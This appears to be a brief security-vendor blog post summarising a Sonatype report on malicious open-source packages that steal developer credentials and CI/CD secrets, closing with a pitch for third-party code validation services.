Hackers Are Weaponizing Open-Source SW

Hackers can and are contributing to open-source projects, but their contributions are not benign.

Open-source – including AI code generators , are the main stay of software development. Saves time and money.

In the second quarter of 2025, data exfiltration remained the top priority for attackers looking to quietly compromise developer environments from the inside out.

In the newest report, Sonatype uncovered 16,279 new pieces of malicious code lurking inside public software repositories like npm and PyPI, bringing the running total to over 845,000.

Hackers hide malicious code inside everyday software libraries that developers use, aiming to steal sensitive information from build systems and CI/CD pipelines. Fifty-five percent of all packages identified were aimed at data exfiltration.

This trend marks another chapter in an escalating arms race inside the software supply chain, where developers, and not the end users, have become the front-line targets, with the attackers stealing credentials and API keys. Specifically, they are going after:

• git credentials
• AWS secrets
• Environment variables
• CI/CD tokens

If they “acquire” these, your customer’s cloud accounts, APIs, databases and internal systems are compromised.

This is not a theoretical problem; it is out there in the real world.

Many time the packages don’t come with source code so it makes it even harder to validate. It is possible, but it is not free.

If you do not have a program to validate code from any third party, you should contact us today.

Credit: Cybernews

by